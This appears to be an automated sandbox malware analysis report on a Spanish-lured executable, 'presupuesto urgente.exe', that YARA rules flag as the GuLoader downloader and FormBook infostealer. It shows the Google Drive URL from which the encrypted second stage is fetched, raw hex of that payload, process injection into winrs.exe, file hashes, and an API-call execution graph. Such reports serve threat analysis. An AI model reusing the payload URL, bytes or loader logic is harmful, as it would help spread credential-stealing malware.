                                                                                                                                                    Host: drive.google.com
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    2024-10-04 09:57:17 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:57:17 GMT
                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU&export=download
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                    Content-Security-Policy: script-src 'nonce-CXGCMvVJWlR9LZhSkWWOaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    Server: ESF
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.11.2049731142.250.176.1934436412C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-04 09:57:18 UTC258OUTGET /download?id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU&export=download HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2024-10-04 09:57:20 UTC4884INHTTP/1.1 200 OK
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Content-Security-Policy: sandbox
                                                                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Content-Disposition: attachment; filename="oFGkE47.bin"
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 272448
                                                                                                                                                    Last-Modified: Fri, 04 Oct 2024 07:59:38 GMT
                                                                                                                                                    X-GUploader-UploadID: AD-8ljtg91I4Rtx_lgv62qcLG3q6_PjP6JecpYaFIHbabMcoaqiPCv6QfDmXwX4HCiZeifwlVtE
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:57:20 GMT
                                                                                                                                                    Expires: Fri, 04 Oct 2024 09:57:20 GMT
                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                    X-Goog-Hash: crc32c=4lk7Mg==
                                                                                                                                                    Server: UploadServer
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
                                                                                                                                                    2024-10-04 09:57:20 UTC4884INData Raw: 87 f8 f2 57 89 c1 91 97 aa 2e ca 5b 4d cf 5e 3f dd 61 27 af d3 68 00 09 dc f6 48 4a a7 ec 29 5f 9e 21 59 8a 53 15 31 34 64 f8 33 e8 8d c7 d9 4d e4 12 84 3e 87 02 48 44 5d 97 3a 78 4d 7d ba a1 de d9 38 d0 04 ee 93 c0 64 8a 04 6b e7 6c b7 2e ff c0 15 b7 05 65 74 fe ed 36 9e 02 12 e0 ff 2f fc 37 a9 8a 91 cd a5 73 54 b6 1f 36 37 58 08 c1 77 f6 03 4d e8 51 90 cd 04 92 9a df 97 23 c0 e6 d3 a6 a0 43 29 fc 9f 35 7e f9 a4 c7 38 3d de e0 15 19 f0 03 41 70 b5 d7 03 2e 25 f7 42 4b a1 f5 a2 2e 17 c7 26 7c ed 5f 7f db a7 a5 02 65 9b 59 09 58 a5 57 0a 4c 7a 6c 3d 18 25 f9 3b 93 ad b3 57 9a 90 78 2a 47 b5 8b 3b ce b3 8f 18 56 92 9b d8 b6 06 c1 61 d0 2e 4c bd 5c e3 7b c2 f2 29 0f 06 d8 a6 7e 70 9a 34 6c d0 92 fc 70 a3 20 97 ff f8 02 30 b5 86 eb 78 a7 7e 52 9a 02 eb ee 68
                                                                                                                                                    Data Ascii: W.[M^?a'hHJ)_!YS14d3M>HD]:xM}8dkl.et6/7sT67XwMQ#C)5~8=Ap.%BK.&|_eYXWLzl=%;Wx*G;Va.L\{)~p4lp 0x~Rh
                                                                                                                                                    2024-10-04 09:57:20 UTC4884INData Raw: 0b 45 be 7b a4 e4 ce 3b cb bd ea 1d 98 7d 1f bf e2 c2 7c dd f0 01 e0 3e 24 24 1d 49 df 0f 53 76 73 af 92 24 60 f4 c5 e7 82 1b 0c 16 9a a2 e0 6b 93 10 29 ae 74 bf f4 8f 2b 95 21 7b 6a f3 03 10 ca 38 f3 1b f8 c6 21 c7 26 0b 29 82 3f 55 90 64 2c 5e 3f 6a 87 82 69 7a 92 92 9d 48 36 7e c8 39 07 81 ea 22 2c 07 ac 8d df b7 91 39 ac 6f 40 a3 ad 20 49 12 f8 15 8b 84 ca fa 56 00 61 98 a6 13 9e f4 97 87 92 a2 a7 86 eb 1d 1f 17 ff 87 66 37 7a c4 b1 1d bb e9 4f a2 83 63 ae a9 17 6a e9 e6 4c 92 ef fe 3e 9b 65 54 b9 1d 5a cb 1e ba 8b d5 81 32 ac fc d0 e6 e0 93 89 b8 f9 de c3 97 8c af 7e 90 f5 6a 92 0b 27 a8 08 13 fe 5c ff ff 99 ab e1 3c 75 52 2c a4 5d c2 86 1b 16 e9 01 c5 cc e2 4f f3 0c 77 00 a5 a7 e9 11 f1 75 a4 8c 8d 0b d9 cb b6 7f 3f 6c ba fc 54 8f c0 f7 73 64 1d 9a
                                                                                                                                                    Data Ascii: E{;}|>$$ISvs$`k)t+!{j8!&)?Ud,^?jizH6~9",9o@ IVaf7zOcjL>eTZ2~j'\<uR,]Owu?lTsd
                                                                                                                                                    2024-10-04 09:57:20 UTC49INData Raw: 98 ae c6 2b e2 a3 e8 cb 86 c7 42 31 3f 62 03 0f 6f 8f a6 97 35 11 0b 5d b7 37 ee ce 13 e5 c8 80 6d 96 85 99 0c bc a6 ea 19 54 2d ce bb 45 3a e2 f3
                                                                                                                                                    Data Ascii: +B1?bo5]7mT-E:
                                                                                                                                                    2024-10-04 09:57:20 UTC1255INData Raw: c6 90 ee 7a 25 47 be 63 92 ab 73 76 f4 e2 ae 32 5b 5c 00 7a 77 a1 45 44 57 12 c3 7a b0 bb c7 f2 b7 c5 13 4f d9 20 b6 31 bf 49 c9 02 ba fb 20 d9 14 2c 19 28 bb e0 96 51 7d 50 57 9a 61 3e 45 39 7e fa 72 31 d7 69 f7 da 14 b1 45 58 27 5d 1f a3 64 5b 81 47 56 d5 bf a4 78 1e 3c 33 02 15 b6 d7 1e 7a b0 09 3b 02 1b 29 58 b8 c6 9f e0 1d 6e ef c7 f6 4f 44 a4 88 8b 9c 1e a8 29 09 c6 c1 01 60 aa 4e 1f fc 0c 27 5a 47 9e 24 d3 5c 24 9e 70 e7 4e 0d 81 d2 06 b7 cb 79 0e d4 87 1e b0 a5 83 28 e3 0c 26 93 ba e7 30 01 58 9a 88 06 d8 23 da fe 2b 9a e8 3d 12 88 73 64 ec 3b bf a3 82 74 db 8b 4f 1e 61 80 ec b6 e2 df 08 46 f3 35 4a a7 62 b2 de 6b 90 4b 7d 80 a9 5d 76 88 6e c9 dc 1d 42 03 75 48 07 a2 e8 c6 3a f6 a4 7b 15 78 8e 53 78 e2 05 91 a8 e3 45 8a d5 a0 81 20 f8 2a 61 62 54
                                                                                                                                                    Data Ascii: z%Gcsv2[\zwEDWzO 1I ,(Q}PWa>E9~r1iEX']d[GVx<3z;)XnOD)`N'ZG$\$pNy(&0X#+=sd;tOaF5JbkK}]vnBuH:{xSxE *abT
                                                                                                                                                    2024-10-04 09:57:20 UTC65INData Raw: fa 7b e5 98 c0 e9 55 0b 1c 48 eb 10 5c 8b bf b7 d7 9d 22 d7 df db a8 5f d5 b4 eb f7 f0 6a 74 67 66 6e d0 df f2 30 2e 15 f9 85 57 6b 5b bf eb 43 4c ea 6a 83 34 60 f1 2c 34 e8 bb 04 46 c4 56 a2 93
                                                                                                                                                    Data Ascii: {UH\"_jtgfn0.Wk[CLj4`,4FV
                                                                                                                                                    2024-10-04 09:57:20 UTC1255INData Raw: e3 26 5d 44 db 61 25 9b 70 8d d7 3b 06 a3 a1 56 d4 7e 3a c8 7c ae fa 26 ca fe 02 83 d5 a4 62 61 8e 58 de 89 17 ec 04 cd 92 9d 6a 59 38 5f c1 8a d9 eb 94 74 cb 5c 5d 36 b4 87 bd aa 8f cb 69 6c f4 b1 11 32 60 6f c4 d8 c6 95 38 63 73 66 5e 23 8b b5 3d aa 50 e6 59 ed a2 fd 20 9f 00 e8 4e be 43 d8 86 3b 8c 92 ff 01 ae 0a d3 c0 68 86 a1 9a dc ef fe fb fc db 45 a2 90 13 20 26 ce cd 99 c0 bb 07 35 0c 7d f1 ad 8c 80 32 62 02 79 e6 f3 07 a8 14 15 d6 8e 59 3c 30 a8 39 19 1b cd 28 ec b3 15 75 63 b3 0c 4e 35 e9 e3 96 ac e9 df 11 29 2c e7 04 f9 4a 6d 28 d2 18 fa 80 2b a5 02 1b 0c 40 cb 55 3c 11 7c d9 57 8f a6 fc 4f 99 0a de c7 5a dd 24 4d 91 e7 43 16 6e a6 49 cd 55 c5 0d 8c 7f 9b 04 7d 78 5c 6e 30 e3 17 97 7f ed bd 73 d3 51 16 8a 77 00 18 5c cf 59 dd 87 34 09 00 5d 38
                                                                                                                                                    Data Ascii: &]Da%p;V~:|&baXjY8_t\]6il2`o8csf^#=PY NC;hE &5}2byY<09(ucN5),Jm(+@U<|WOZ$MCnIU}x\n0sQw\Y4]8
                                                                                                                                                    2024-10-04 09:57:20 UTC1255INData Raw: 21 b4 ea d4 9b 84 53 48 53 2d da 9c 05 f0 47 4f b9 6f 40 6f a4 03 61 d7 c5 8e 12 38 8f aa b4 3f b1 72 5a a7 bf 98 66 59 03 7a dc eb b5 35 13 a2 f3 48 cc ee 19 ef 14 04 2d 45 f6 64 76 27 06 bb 89 04 16 d6 0d 8d 72 04 b2 6d c8 55 98 8e 29 cb 2b 76 7d 82 ec b5 18 3f 59 11 87 83 ee e8 33 6f 76 89 6b 3c 43 ac 7c 3e 4e d0 cb 3e 91 65 a7 81 47 20 c1 f8 5c ce db 97 01 3d f3 b5 db 54 83 84 7f a5 55 1a db a7 a3 32 fa d2 9b 52 7f 2f 4a a6 dc 00 66 4d 29 48 1f ad a7 c9 e0 74 4e 28 a0 88 7c e7 74 57 33 1f d2 a5 da 98 84 2d 55 d2 24 5b 2c 0b fe 78 c7 e5 87 32 85 c7 24 3f c7 7c c8 79 a3 72 35 a0 24 41 77 dd b4 18 25 f9 83 3b ad b3 2e 16 3d fc 17 27 d2 78 3b 3c d4 7c 25 39 b9 2d 36 5a db c6 e3 28 60 bf a7 40 7c 88 fe 92 75 36 13 32 c7 c5 39 02 d8 60 c4 43 0c 3c d7 d2 07
                                                                                                                                                    Data Ascii: !SHS-GOo@oa8?rZfYz5H-Edv'rmU)+v}?Y3ovk<C|>N>eG \=TU2R/JfM)HtN(|tW3-U$[,x2$?|yr5$Aw%;.='x;<|%9-6Z(`@|u629`C<
                                                                                                                                                    2024-10-04 09:57:20 UTC1255INData Raw: 72 0e 14 0c 5f 12 92 72 8a 3d 23 6d 94 b8 20 da cb 5c 34 db f6 64 e4 7c 88 1a 83 22 7e b4 f5 6f 45 0d 67 c1 88 8a 20 de 57 02 df 96 e1 d8 b2 0b 18 77 7f 15 cd 2f 70 88 b3 8c f5 13 44 59 4f 40 72 91 4e ad fd 3a da 3c ab 60 c0 2a 85 8d d8 5a 8d b8 87 bc 50 fc 96 f4 a1 8b 14 40 75 60 1c 40 53 f8 ff cd c5 d1 41 4d 1e 2b 59 2f ae 6a 1c 61 0a 5d 7e 53 75 bb d5 4a 28 fe 60 2b a5 05 77 9d f4 be f3 ca 55 da 14 e5 27 2e 45 96 2e c9 fa 2e cc a2 34 57 47 84 b9 06 52 f0 f8 90 e1 a4 08 c7 de f2 c2 1c b4 aa c4 56 b1 c5 0c bb 43 88 23 95 81 f5 1c 2d 11 7c 5b 91 0d 29 36 fb 24 87 c3 0d 3a c9 8d 57 cf 84 9b e4 ba eb 29 99 93 9f d3 3b 39 02 06 aa b8 48 49 17 3c c3 82 6d 83 f6 14 fd 57 7d 57 79 22 6b 2b 57 1c 84 c5 12 26 cc fc af 12 78 97 6e 7a 9c d5 19 1d 85 63 83 44 16 7e
                                                                                                                                                    Data Ascii: r_r=#m \4d|"~oEg Ww/pDYO@rN:<`*ZP@u`@SAM+Y/ja]~SuJ(`+wU'.E..4WGRVC#-|[)6$:W);9HI<mW}Wy"k+W&xnzcD~
                                                                                                                                                    2024-10-04 09:57:20 UTC1255INData Raw: 04 8a 4a 64 ca d6 ee 04 21 34 e7 fc c8 53 51 24 38 5e 29 32 94 17 9b a4 a5 03 1b 9a 18 14 53 8e c6 e5 99 8f 22 26 89 d0 1c c4 87 61 1e c1 fd 96 c0 02 be d3 38 b3 4c cd 76 e7 ea 12 15 5b 0c 6b d9 f3 1d 00 b2 3c 8b bf af 78 0e b3 50 90 7a 54 2f 94 b9 e0 91 a5 16 f1 d0 0b ac 5d cd b4 82 62 6a 2d 26 c7 bf c8 f5 41 58 d4 72 96 26 95 5a 25 67 93 ec de d9 6e 0e 45 b8 da 4d 1f ff 80 ff 38 20 60 36 a1 6f 27 2f 98 87 70 3d 91 86 57 b1 78 ae af d9 0d 15 3d 05 c6 eb 9a 7a 86 a3 3f eb dc 7d 15 9f 9e 2c 21 70 d4 56 ab 93 01 37 b8 9c d7 5e 0e 6f b6 95 2e 51 38 aa d9 98 12 0e de f2 ae 1c 8e 8f a3 6e 4c 55 9d 68 e2 4b 69 5f 85 92 3f 34 83 6f 4e 7c 8a 0d ec b2 31 7d f9 77 b7 10 91 4c 1b 8e a9 9e fe 11 30 8c 1c 0b 62 d2 fb 70 81 be 89 e8 a0 eb c9 59 8f be 8d 7d 15 40 05 b9
                                                                                                                                                    Data Ascii: Jd!4SQ$8^)2S"&a8Lv[k<xPzT/]bj-&AXr&Z%gnEM8 `6o'/p=Wx=z?},!pV7^o.Q8nLUhKi_?4oN|1}wL0bpY}@
                                                                                                                                                    2024-10-04 09:57:20 UTC1255INData Raw: b2 a1 5a c1 80 c9 a2 e0 62 95 7b fb 1f 1d 2a fe 2d 30 10 c4 88 50 e3 00 a4 7f de 38 fe 17 c7 47 fb cf db 5b ab f2 fc 7b 8f e9 3a c3 67 73 c7 3c 81 7c 3e 8a f2 1d eb bd a9 af ea 24 45 50 ae b2 17 20 8e bf 61 4a b9 0d 30 69 24 f2 3d 9b e7 77 82 0e e3 3a de 76 c6 68 69 f1 26 c6 db 09 81 d9 ae 81 b7 3f 0c a5 bd da ff 4f dd f4 f0 68 4d 31 e0 23 e3 0d 90 46 17 f6 90 8a 82 d8 35 3c 2e b5 6e 42 9f 54 4f b5 25 46 9a 92 c0 f6 a7 69 b3 ab fe f4 86 d4 27 56 60 76 d2 11 d4 fc 37 7e 4f a3 c0 5e d4 f4 b3 86 13 13 03 d5 7d 28 bc 4b a8 cc ad ee f7 3f 39 0c f6 90 84 44 e6 28 51 11 c7 e5 8c 00 ae 01 8e 3f b8 09 dd 7b d5 d2 e6 22 39 1d ad 1a 1f cf 40 a3 5f f4 08 71 57 9c 79 19 0b 58 b7 6d 36 30 88 69 a1 23 48 6c 38 7c a6 38 0e 90 e4 46 c2 50 e1 ad 77 ea 38 b9 3a 0a 6e c1 c2
                                                                                                                                                    Data Ascii: Zb{*-0P8G[{:gs<|>$EP aJ0i$=w:vhi&?OhM1#F5<.nBTO%Fi'V`v7~O^}(K?9D(Q?{"9@_qWyXm60i#Hl8|8FPw8:n


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:05:56:27
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\presupuesto urgente.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:582'088 bytes
                                                                                                                                                    MD5 hash:8AE672783481C0B46780431BFCE5A216
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.8108880079.00000000045E8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:05:57:12
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\presupuesto urgente.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:582'088 bytes
                                                                                                                                                    MD5 hash:8AE672783481C0B46780431BFCE5A216
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.8355119953.0000000002B38000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:05:57:37
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe"
                                                                                                                                                    Imagebase:0x580000
                                                                                                                                                    File size:140'800 bytes
                                                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:05:57:38
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\winrs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\winrs.exe"
                                                                                                                                                    Imagebase:0x7c0000
                                                                                                                                                    File size:43'008 bytes
                                                                                                                                                    MD5 hash:E6C1CE56E6729A0B077C0F2384726B30
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:05:58:08
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                    Imagebase:0x7ff6ce530000
                                                                                                                                                    File size:597'432 bytes
                                                                                                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Reset < >

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:17.3%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:13.2%
                                                                                                                                                      Signature Coverage:20.6%
                                                                                                                                                      Total number of Nodes:1590
                                                                                                                                                      Total number of Limit Nodes:37
                                                                                                                                                      execution_graph 5086 10001000 5089 1000101b 5086->5089 5096 10001516 5089->5096 5091 10001020 5092 10001024 5091->5092 5093 10001027 GlobalAlloc 5091->5093 5094 1000153d 3 API calls 5092->5094 5093->5092 5095 10001019 5094->5095 5098 1000151c 5096->5098 5097 10001522 5097->5091 5098->5097 5099 1000152e GlobalFree 5098->5099 5099->5091 4198 401941 4199 401943 4198->4199 4200 402c37 17 API calls 4199->4200 4201 401948 4200->4201 4204 405abe 4201->4204 4243 405d89 4204->4243 4207 405ae6 DeleteFileW 4209 401951 4207->4209 4208 405afd 4211 405c28 4208->4211 4257 4063b0 lstrcpynW 4208->4257 4211->4209 4275 4066f3 FindFirstFileW 4211->4275 4212 405b23 4213 405b36 4212->4213 4214 405b29 lstrcatW 4212->4214 4258 405ccd lstrlenW 4213->4258 4215 405b3c 4214->4215 4218 405b4c lstrcatW 4215->4218 4220 405b57 lstrlenW FindFirstFileW 4215->4220 4218->4220 4222 405c1d 4220->4222 4241 405b79 4220->4241 4221 405c46 4278 405c81 lstrlenW CharPrevW 4221->4278 4222->4211 4225 405c00 FindNextFileW 4228 405c16 FindClose 4225->4228 4225->4241 4226 405a76 5 API calls 4229 405c58 4226->4229 4228->4222 4230 405c72 4229->4230 4231 405c5c 4229->4231 4233 405414 24 API calls 4230->4233 4231->4209 4234 405414 24 API calls 4231->4234 4233->4209 4236 405c69 4234->4236 4235 405abe 60 API calls 4235->4241 4237 406176 36 API calls 4236->4237 4239 405c70 4237->4239 4238 405414 24 API calls 4238->4225 4239->4209 4240 405414 24 API calls 4240->4241 4241->4225 4241->4235 4241->4238 4241->4240 4262 4063b0 lstrcpynW 4241->4262 4263 405a76 4241->4263 4271 406176 MoveFileExW 4241->4271 4281 4063b0 lstrcpynW 4243->4281 4245 405d9a 4282 405d2c CharNextW CharNextW 4245->4282 4248 405ade 4248->4207 4248->4208 4249 406644 5 API calls 4254 405db0 4249->4254 4250 405de1 lstrlenW 4251 405dec 4250->4251 4250->4254 4253 405c81 3 API calls 4251->4253 4252 4066f3 2 API calls 4252->4254 4255 405df1 GetFileAttributesW 4253->4255 4254->4248 4254->4250 4254->4252 4256 405ccd 2 API calls 4254->4256 4255->4248 4256->4250 4257->4212 4259 405cdb 4258->4259 4260 405ce1 CharPrevW 4259->4260 4261 405ced 4259->4261 4260->4259 4260->4261 4261->4215 4262->4241 4288 405e7d GetFileAttributesW 4263->4288 4266 405aa3 4266->4241 4267 405a91 RemoveDirectoryW 4269 405a9f 4267->4269 4268 405a99 DeleteFileW 4268->4269 4269->4266 4270 405aaf SetFileAttributesW 4269->4270 4270->4266 4272 406197 4271->4272 4273 40618a 4271->4273 4272->4241 4291 405ffc 4273->4291 4276 405c42 4275->4276 4277 406709 FindClose 4275->4277 4276->4209 4276->4221 4277->4276 4279 405c4c 4278->4279 4280 405c9d lstrcatW 4278->4280 4279->4226 4280->4279 4281->4245 4283 405d49 4282->4283 4286 405d5b 4282->4286 4285 405d56 CharNextW 4283->4285 4283->4286 4284 405d7f 4284->4248 4284->4249 4285->4284 4286->4284 4287 405cae CharNextW 4286->4287 4287->4286 4289 405a82 4288->4289 4290 405e8f SetFileAttributesW 4288->4290 4289->4266 4289->4267 4289->4268 4290->4289 4292 406052 GetShortPathNameW 4291->4292 4293 40602c 4291->4293 4294 406171 4292->4294 4295 406067 4292->4295 4318 405ea2 GetFileAttributesW CreateFileW 4293->4318 4294->4272 4295->4294 4297 40606f wsprintfA 4295->4297 4299 4063d2 17 API calls 4297->4299 4298 406036 CloseHandle GetShortPathNameW 4298->4294 4300 40604a 4298->4300 4301 406097 4299->4301 4300->4292 4300->4294 4319 405ea2 GetFileAttributesW CreateFileW 4301->4319 4303 4060a4 4303->4294 4304 4060b3 GetFileSize GlobalAlloc 4303->4304 4305 4060d5 4304->4305 